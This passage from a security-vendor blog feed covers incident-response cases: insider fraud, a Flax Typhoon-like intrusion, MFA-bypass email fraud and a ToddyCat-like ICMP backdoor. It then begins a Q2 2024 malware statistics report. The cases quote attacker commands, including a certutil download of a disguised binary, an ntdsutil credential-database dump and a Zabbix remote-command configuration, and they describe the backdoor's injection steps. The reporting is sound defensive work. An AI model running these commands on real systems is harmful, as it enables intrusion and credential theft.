involved.</p><p>In the other case, one of the users modified the privileges and details of another user, impersonating that user to create additional transactions in the internal service and attempting to hide the original details. Later, this newly modified user accessed the VPN from a previously known system where another user was accessing the transaction system for what was initially catalogued as legitimate activity, but which was recently confirmed to be part of the malicious activity.</p><p>Most of the criminal activity was performed by accessing the infrastructure through the VPN, but it was discovered that a new user was accessing the transaction system from the internal network using the same unauthorized behavior.</p><p>The results of the GERT team’s analysis confirmed the collusion of a user involved in the transaction requests and managed to identify the sources and link the user activity to various systems involved in the investigation, including local and remote IDs. This information was used by the customer in a timely manner to take legal action against the insider employee and his accomplices.</p><h3 id="mitre-attck-techniques">Mitre ATT&CK techniques</h3><table width="100%"><tbody><tr><td style="text-align: left" width="25%"><strong>Tactic</strong></td><td style="text-align: left" width="25%"><strong>Technique used </strong></td><td style="text-align: left" width="25%"><strong>Technique ID</strong></td><td style="text-align: left" width="25%"><strong>Details</strong></td></tr><tr><td>Initial Access<br />Persistence</td><td>Valid Accounts</td><td>T1078</td><td>The adversaries used legitimate credentials to access the VPN and the internal service</td></tr><tr><td>Initial Access</td><td>External Remote Services</td><td>T1133</td><td>The adversary used the сustomer’s VPN service to gain network access to the internal service</td></tr><tr><td>Credential Access</td><td>Steal Web Session Cookie</td><td>T1539</td><td>The adversary abused a misconfiguration in the transactions service to steal other users’ cookies.</td></tr><tr><td>Impact</td><td>Data Manipulation</td><td>T1565</td><td>After impersonating other users with privileges to create transactions, the adversary started creating unauthorized transactions on their behalf.</td></tr></tbody></table><h2 id="flax-typhoon-slime13-apt-attack">Flax Typhoon/SLIME13 APT attack</h2><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113660" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-1024x576.png" alt="" width="1024" height="576" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-1024x576.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-300x169.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-768x432.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-1536x864.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-800x450.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-622x350.png 622w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-740x416.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02-498x280.png 498w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161216/incident_response_interesting_cases_2023_02.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p><p>After enabling Kaspersky Managed Detection and Response (MDR) in a customer’s infrastructure, our platforms detected the presence of well-known software installed on the customer’s premises without their knowledge.</p><p>Although these applications were legitimate, attackers used them to gain persistent access to the victim’s environment.</p><p>In September 2023, Kaspersky MDR detected a suspicious service on a corporate host. The adversaries used a technique that mimicked the real system application name <em>conhost.exe</em>, but the service was started from a non-standard folder. GERT’s analysis confirmed that the application wasn’t a system service, but was instead associated with SoftEther VPN, a legitimate multi-protocol VPN software.</p><p>The supposed <em>conhost</em> application was downloaded to the system by a legitimate local user using the well-known Windows LOLBin <em>certutil</em>, and then installed via command line as a system service:</p><pre class="crayon-plain-tag">certutil.exe -urlcache -split -f hxxp://<Public IP>/conhost.exe</pre><p>Another suspicious service masquerading as <em>wshelper.dll</em> was observed on another host. This DLL was associated with <em>Zabbix agent</em>, which is typically deployed on a monitoring target to actively monitor local resources and applications.</p><p>Analysis of the sample confirmed that the configuration file was set to allow remote commands, taking advantage of passive and active checks enabled by <em>Zabbix</em>.</p><pre class="crayon-plain-tag">EnableRemoteCommands=1LogFile=0Server=0.0.0.0/0ListenPort=5432</pre><p>Port 5432 was configured in a firewall rule to allow listening, with the “smart” name PGSQL to make it look legitimate.</p><p>GERT’s analysis confirmed that the intrusion lasted more than two years. In the early stages of the attack, an NTDS dump was created using system commands:</p><pre class="crayon-plain-tag">cmd /c ntdsutil "ac i ntds" ifm "create full c:\PerfLogs\test" q q c:\windows\sysvol\domain\ntds\active directory\ntds.dit"</pre><p>During those two years of intrusion, security controls detected and contained multiple attempts to execute pentesting applications such as Mimikatz and CobaltStrike, but all the repurposed legitimate software remained invisible until the customer decided to implement our MDR solution. GERT analysis confirmed that the infrastructure had been compromised since mid-2021. The artifacts and TTPs of the attackers are similar to those used by the <a href="https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/" target="_blank" rel="noopener">Flax Typhoon APT group</a>, which employs minimal malware and custom payloads, but relies heavily on legitimate applications instead.</p><h3 id="mitre-attck-techniques">Mitre ATT&CK techniques</h3><table width="100%"><tbody><tr><td style="text-align: left" width="25%"><strong>Tactic</strong></td><td style="text-align: left" width="50%"><strong>Technique used </strong></td><td style="text-align: left" width="25%"><strong>Technique ID</strong></td></tr><tr><td>Initial Access</td><td>Exploit Public-Facing Application</td><td>T1190</td></tr><tr><td>Resource Development</td><td>Develop Capabilities: Malware</td><td>T1587.001</td></tr><tr><td>Credential Access</td><td>OS Credential Dumping: LSASS Memory</td><td>T1003.001</td></tr><tr><td>Credential Access</td><td>OS Credential Dumping: Security Account Manager</td><td>T1003.002</td></tr><tr><td>Command And Control</td><td>Protocol Tunneling</td><td>T1572</td></tr><tr><td>Command And Control</td><td>Ingress Tool Transfer</td><td>T1105</td></tr><tr><td>Credential Access</td><td>Brute Force: Password Spraying</td><td>T1110.003</td></tr><tr><td>Execution</td><td>Exploitation for Client Execution</td><td>T1203</td></tr><tr><td>Lateral Movement</td><td>Remote Services: Remote Desktop Protocol</td><td>T1021.001</td></tr><tr><td>Lateral Movement</td><td>Remote Services: SMB/Windows Admin Shares</td><td>T1021.002</td></tr><tr><td>Defense Evasion</td><td>Masquerading: Match Legitimate Name or Location</td><td>T1036 .005</td></tr></tbody></table><h2 id="the-mfa-lack-of-control">The MFA lack of control</h2><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113661" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-1024x576.png" alt="" width="1024" height="576" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-1024x576.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-300x169.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-768x432.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-1536x864.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-800x450.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-622x350.png 622w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-740x416.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03-498x280.png 498w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30161749/incident_response_interesting_cases_2023_03.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p><p>After enabling multi-factor authentication (MFA) for its “critical employees”, a financial company was targeted by a spear-phishing attack.</p><p>The phishing attack spoofed the popular DocuSign platform and was directed at a specific group of employees. Although the company detected the phishing attack and configured rules to avoid receiving similar emails, some users received and opened the malicious email.</p><p>Among those who unwittingly opened the link was one of the protected users. The attackers were able to take control of his account thanks to the implementation of a <a href="https://securelist.com/phishing-kit-market-whats-inside-off-the-shelf-phishing-packages/106149/" target="_blank" rel="noopener">phishing kit</a> configured to automatically steal the MFA tokens.</p><p>The initial phishing attack occurred on October 6, 2023, and GERT analysts confirmed that one of the targeted users opened the malicious email the same day, which was followed by new connections opened from different locations outside the company’s headquarters. The attackers also configured additional MFA devices to access the target user’s mailbox contents without being noticed and without tampering with the original mailbox.</p><p>The attackers accessed the contents of the mailbox for a few days, allowing them to understand internal processes and prepare a BEC attack.</p><p>One month after the initial access, the attackers compromised a privileged email account (where MFA was not enabled). This new account had privileges in Microsoft 365, which allowed new rules and parameters to be configured. The attackers configured “send as” privileges on behalf of critical users, such as money transfer approvers and requesters. The adversaries also used this account to configure forwarding rules to hide messages received from a specific bank and from specific users.</p><p>Once the necessary privileges and rules were configured, the attackers sent a new email request using a legitimate template previously used in the company to request money transfers and attached documents collected from the original compromised account, but with a different destination bank account, requesting an international transfer of more than $300,000.</p><p>Upon receiving the request, the bank processed the transfer as usual based on the legitimate source and attached documents.</p><p>A notification was sent to the customer from an email address belonging to the bank, confirming the transfer. However, this email address wasn’t listed in the attackers’ forwarding rules, so the message was delivered to the customer’s mailbox. After receiving this message, the customer decided to investigate the user responsible for the privileged mail account.</p><p>GERT’s analysis confirmed the initial attack date and vector, the compromised users, and all the techniques used by the threat actors, and provided a set of recommendations for protecting and monitoring cloud assets. By analyzing user access logs (UAL) and additional cloud logs, as well as firewall logs and the client’s own system logs, GERT was able to provide a complete timeline detailing all the techniques used by the fraudsters.</p><h3 id="mitre-attck-techniques">Mitre ATT&CK techniques</h3><table width="100%"><tbody><tr><td style="text-align: left" width="20%"><strong>Tactic</strong></td><td style="text-align: left" width="30%"><strong>Technique used </strong></td><td style="text-align: left" width="20%"><strong>Technique ID</strong></td><td style="text-align: left" width="30%"><strong>Details</strong></td></tr><tr><td>Initial Access</td><td>Phishing: Spear phishing Link</td><td>T1566.002</td><td>Targeted attack against customer domain from October 6, 2023</td></tr><tr><td>Persistence</td><td>Account Manipulation: Device Registration</td><td>T1098.005</td><td>Multiple authentication methods enabled for a compromised user</td></tr><tr><td>Credential Access</td><td>Brute Force: Password Guessing</td><td>T1110.001</td><td>Failed access on behalf of multiple users</td></tr><tr><td>Credential Access</td><td>Brute Force: Password Spraying</td><td>T1110.003</td><td>Tests for attempted access using credentials confirmed as stolen by Malware Stealers</td></tr><tr><td>Privilege Escalation</td><td>Account Manipulation: Additional Email Delegate Permissions</td><td>T1098.002</td><td>New permission configured to avoid detection and to access different mailboxes</td></tr><tr><td>Persistence</td><td>Email Collection: Email Forwarding Rule</td><td>T1114.003</td><td>New rules configured to evade detection and remain persistent</td></tr></tbody></table><h2 id="toddycat-like-apt-attack-with-an-icmp-backdoor">ToddyCat-like APT attack with an ICMP backdoor</h2><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113662" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-1024x529.png" alt="" width="1024" height="529" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-1024x529.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-300x155.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-768x397.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-1536x794.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-677x350.png 677w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-740x382.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-542x280.png 542w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04-800x413.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30162219/incident_response_interesting_cases_2023_04.png 1916w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p><p>Kaspersky’s Managed and Detection Response service (MDR) was alerted to suspicious activity on domain controllers and Exchange servers.</p><p>GERT was contacted to investigate the case; our analysis confirmed SMB abuse and IKEEXT service exploitation, as well as exploitation of the Microsoft Exchange server remote code execution vulnerability (<a href="https://www.cve.org/CVERecord?id=CVE-2021-26855" target="_blank" rel="noopener">CVE-2021-26855</a>).</p><p>One interesting finding was the use of IKEEXT for persistence. The vulnerability used by the attackers, along with the exploit for it, was first published by High-Tech Bridge Security Research Lab in 2012. It was associated with the <em>wlbsctrl.dll</em> library and originally used for privilege escalation. Shortly after the exploit was published, Microsoft patched the vulnerability. However, our analysts confirmed that the same library is now being used as a persistence mechanism for malware.</p><p>IKEEXT is a default service on Windows. It is invoked by the <em>svchost</em> process, which loads <em>ikeext.dll</em>, the DLL responsible for the IKEEXT service.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113663" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-1024x181.png" alt="" width="1024" height="181" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-1024x181.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-300x53.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-768x135.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-1536x271.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-740x130.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-1588x280.png 1588w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05-800x141.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30163011/incident_response_interesting_cases_2023_05.png 1781w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p><p>The <em>ikeext.dll</em> library, in turn, is responsible for loading a DLL named <em>wlbsctrl.dll</em>, which is default Windows behavior. However, while the <em>svchost</em> service always runs on the system,<em> wlbsctrl.dll</em> does not exist in the file system by default, and this where threat actors saw an opportunity.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164509/incident_response_interesting_cases_2023_06.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-113664" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164509/incident_response_interesting_cases_2023_06.png" alt="" width="607" height="700" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164509/incident_response_interesting_cases_2023_06.png 607w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164509/incident_response_interesting_cases_2023_06-260x300.png 260w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164509/incident_response_interesting_cases_2023_06-304x350.png 304w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164509/incident_response_interesting_cases_2023_06-243x280.png 243w" sizes="(max-width: 607px) 100vw, 607px" /></a></p><p>The threat actors created a malicious version of <em>wlbsctrl.dll</em> and saved it on the system. Based on Windows behavior, this DLL was executed every time without requiring registration in Autorun, which is commonly used for persistence.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113665" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-1024x469.png" alt="" width="1024" height="469" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-1024x469.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-300x137.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-768x352.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-1536x704.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-764x350.png 764w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-740x339.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-611x280.png 611w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07-800x367.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30164542/incident_response_interesting_cases_2023_07.png 1698w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p><p>Besides persistence, in the investigated incident the threat actor used the IKEEXT vulnerability to perform lateral movement via the SMB protocol and created a custom firewall rule named DLL Surrogate that permits <em>dllhost.exe</em> to listen on custom port 52415. All this was achieved by placing the backdoored <em>wlbsctrl.dll</em> into the system32 folder where the legitimate library is normally stored (if present on the system).</p><p>Later, the attacker implemented an ICMP backdoor. Once the backdoor was identified, Kaspersky verified and detected two more in-the-wild samples outside the customer’s infrastructure. All the discovered samples were similar except for the following points:</p><ul><li>Some differences in the PE header (normal behavior between similar samples);</li><li>Different mutex strings, all located at the same raw file offset;</li><li>Different bytes at the raw file offset 0x452–0x483, which are apparently useless (non-actionable) code.</li></ul><p>Based on GERT’s analysis, the backdoor acted like a loader, configured to execute the following activities:</p><ul><li>Check for the mutex; if it already exists in memory, terminate the process.</li><li>Attempt to read the file %WINDIR%\Microsoft.NET\Framework\sbs_clrhost.res; decrypt its contents using the AES algorithm with a hardcoded KEY and a KEY derived from the volume serial number (VSN) of the C drive, then use it to set the value of the registry key “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, and then delete the file.</li><li>Load the contents of the default value of registry key “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, decrypt it again with AES using the same KEY described above, and invoke the payload shellcode.</li><li>Allocate the shellcode size in a new segment and jump to it.</li></ul><p>Note: The calculated REGKEY NAME (Interface {<calculated_for_each_host>}) is based on the VSN of the C drive (without host VSN it is not possible to decrypt correctly).</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113666" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-1015x1024.png" alt="" width="1015" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-1015x1024.png 1015w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-297x300.png 297w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-150x150.png 150w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-768x775.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-1522x1536.png 1522w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-347x350.png 347w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-740x747.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-277x280.png 277w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-800x807.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08-50x50.png 50w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30170329/incident_response_interesting_cases_2023_08.png 1653w" sizes="(max-width: 1015px) 100vw, 1015px" /></a></p><p>As part of the analysis, GERT identified a payload stored in the Windows registry and analyzed it, confirming the following behavior in the encrypted payload.</p><p>The decrypted payload has the header “CAFEBABE” (hex bytes magic related to Java Class files) followed by the shellcode size and finally the data. This payload executes the following commands:</p><ol><li>Decrypt itself (for the third time);</li><li>If not running under <em>exe</em>, create a suspended<em> dllhost</em> process with the parameter “/Processid: {02D4B3F1-FD88-11D1-960D-00805FC79235}”, which refers to a COM+ system application service;</li><li>Allocate space to the new process;</li><li>Write a section of the decrypted payload (starting at offset 0x1A03, and having a size that’s contained in the small header at offset 0x19FF) into the new allocation;</li><li>Patch <em>dllhost</em> (in memory only) to ensure execution at the newly allocated space;</li><li>Resume the <em>dllhost</em> process.</li></ol><p>A new instance of the shellcode starts from step one. It finds that it is actually running under <em>dllhost</em>, decrypts a new section, executes it and listens on port 52415. The final payload injected into <em>dllhost.exe</em> appears to create a raw ICMP socket with no port. No outbound connection is made (although the received payload likely communicates outbound). Data is received from an unknown source in a Base64-encoded ICMP packet, converted to binary, decrypted, and executed via direct execution of data (allocating space using the VirtualAlloc function), copying shellcode to the allocated space, making a direct call to the allocated space.</p><p>According to our threat intelligence platforms, this threat has similarities to APT attacks: the attack Tactics, Techniques and Procedures (TTP) used are very similar to <a href="https://securelist.com/tag/toddycat/" target="_blank" rel="noopener">the ToddyCat actor</a>, but there’s no solid attribution to this group.</p><p>The objective of the threat actor was to gain persistence for monitoring and future impact, but no other objectives were confirmed based on the evidence obtained.</p><h3 id="mitre-attck-techniques">Mitre ATT&CK techniques</h3><table width="100%"><tbody><tr><td style="text-align: left" width="30%"><strong>Tactic</strong></td><td style="text-align: left" width="50%"><strong>Technique used </strong></td><td style="text-align: left" width="20%"><strong>Technique ID</strong></td></tr><tr><td>Resource Development</td><td>Develop Capabilities: Exploits</td><td>T1587.004</td></tr><tr><td>Resource Development</td><td>Develop Capabilities: Malware</td><td>T1587.001</td></tr><tr><td>Initial Access</td><td>Valid Accounts: Domain Accounts</td><td>T1078.002</td></tr><tr><td>Initial Access</td><td>Valid Accounts: Local Accounts</td><td>T1078.003</td></tr><tr><td>Execution</td><td>System Services: Service Execution</td><td>T1569.002</td></tr><tr><td>Execution</td><td>User Execution: Malicious File</td><td>T1204.002</td></tr><tr><td>Persistence</td><td>Create or Modify System Process: Windows Service</td><td>T1543.003</td></tr><tr><td>Persistence</td><td>Hijack Execution Flow: DLL Side-Loading</td><td>T1574.002</td></tr><tr><td>Persistence</td><td>Server Software Component: Web Shell</td><td>T1505.003</td></tr><tr><td>Persistence</td><td>Valid Accounts: Domain Accounts</td><td>T1078.002</td></tr><tr><td>Defense Evasion</td><td>Abuse Elevation Control Mechanism: Bypass User Account Control</td><td>T1548.002</td></tr><tr><td>Defense Evasion</td><td>Direct Volume Access</td><td>T1006</td></tr><tr><td>Defense Evasion</td><td>Modify Registry</td><td>T1112</td></tr><tr><td>Defense Evasion</td><td>Impair Defenses: Disable or Modify System Firewall</td><td>T1562.004</td></tr><tr><td>Defense Evasion</td><td>Impair Defenses: Disable Windows Event Logging</td><td>T1562.002</td></tr><tr><td>Defense Evasion</td><td>Indicator Removal: Clear Windows Event Logs</td><td>T1070.001</td></tr><tr><td>Defense Evasion</td><td>Indicator Removal: File Deletion</td><td>T1070.004</td></tr><tr><td>Defense Evasion</td><td>Impair Defenses: Impair Command History Logging</td><td>T1562.003</td></tr><tr><td>Command And Control</td><td>Non-Application Layer Protocol</td><td>T1095</td></tr></tbody></table><h2 id="conclusions">Conclusions</h2><p>Although statistics show the government sector was the most targeted vertical last year, it is clear that threat and crimeware actors do not care which vertical their potential targets belong to. To stay ahead of the attackers, the best course of action is to assess your asset inventory and continue to monitor and protect it.</p><p>The trend of cyberattacks and intrusions making use of infrastructure assets or legitimate on-premises applications creates the need to enable additional layers of monitoring based on threat intelligence. The implementation of MDR has been one of the recurring triggers for new investigations thanks to its detection capabilities and the ability of analysts to determine timely courses of action.</p><p>To learn more about our Incident Response report, we invite you to view the recording of the webinar <a href="https://securelist.com/webinars/analyzing-last-years-cyber-incident-cases/" target="_blank" rel="noopener">“Analyzing last year’s cyber incident cases”</a>.</p>]]></content:encoded> <wfw:commentRss>https://securelist.com/incident-response-interesting-cases-2023/113611/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03092959/gert-interesting-cases-featured-1.jpg" width="1600" height="1005"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03092959/gert-interesting-cases-featured-1-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03092959/gert-interesting-cases-featured-1-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03092959/gert-interesting-cases-featured-1-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>IT threat evolution in Q2 2024. Non-mobile statistics</title> <link>https://securelist.com/it-threat-evolution-q2-2024-pc-statistics/113683/</link> <comments>https://securelist.com/it-threat-evolution-q2-2024-pc-statistics/113683/#respond</comments> <dc:creator><![CDATA[AMR]]></dc:creator> <pubDate>Tue, 03 Sep 2024 08:00:47 +0000</pubDate> <category><![CDATA[Malware reports]]></category> <category><![CDATA[Apple MacOS]]></category> <category><![CDATA[Internet of Things]]></category> <category><![CDATA[Malware]]></category> <category><![CDATA[Malware Descriptions]]></category> <category><![CDATA[Malware Statistics]]></category> <category><![CDATA[Malware Technologies]]></category> <category><![CDATA[Miner]]></category> <category><![CDATA[Ransomware]]></category> <category><![CDATA[Trojan]]></category><category><![CDATA[Secure environment (IoT)]]></category> <category><![CDATA[Unix and macOS malware]]></category> <category><![CDATA[Windows malware]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113683</guid> <description><![CDATA[This report presents statistics on PC threats for Q2 2024, including data on ransomware, miners, threats to macOS and IoT devices.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><em>The statistics presented here are based on detection verdicts by Kaspersky products and services received from users who consented to providing statistical data.</em></p><h2 id="quarterly-figures">Quarterly figures</h2><p>In Q2 2024:</p><ul><li>Kaspersky solutions blocked over 664 million attacks from various internet sources.</li><li>The web antivirus reacted to 113.5 million unique URLs.</li><li>The file antivirus blocked over 27 million malicious and unwanted objects.</li><li>Almost 86,000 users encountered ransomware attacks.</li><li>Nearly 12% of all ransomware victims whose data was published on DLSs (data leak sites) were affected by the Play ransomware group.</li><li>Nearly 340,000 users faced miner attacks.</li></ul><h2 id="ransomware">Ransomware</h2><h3 id="quarterly-trends-and-highlights">Quarterly trends and highlights</h3><h4 id="law-enforcement-successes">Law enforcement successes</h4><p>In April 2024, a criminal who developed a packer that was allegedly used by the Conti and Lockbit groups to evade antivirus detection was <a href="https://www.bleepingcomputer.com/news/security/police-arrest-conti-and-lockbit-ransomware-crypter-specialist/" target="_blank" rel="noopener">arrested</a> in Kyiv. According to Dutch police, the arrested individual was directly involved in at least one attack using the Conti ransomware in 2021. The criminal has already been charged.</p><p>In May, a member of the REvil group, arrested back in October 2021, was <a href="https://www.bleepingcomputer.com/news/security/revil-hacker-behind-kaseya-ransomware-attack-gets-13-years-in-prison/" target="_blank" rel="noopener">sentenced</a> to 13 years in prison and ordered to pay $16 million. The cybercriminal was involved in over 2,500 REvil attacks, resulting in more than $700 million in total damages.</p><p>In June, the FBI <a href="https://www.bleepingcomputer.com/news/security/fbi-recovers-7-000-lockbit-keys-urges-ransomware-victims-to-reach-out/" target="_blank" rel="noopener">announced</a> that it had obtained over 7,000 decryption keys for files encrypted by Lockbit ransomware attacks. The Bureau encourages victims to contact the Internet Crime Complaint Center (IC3) at 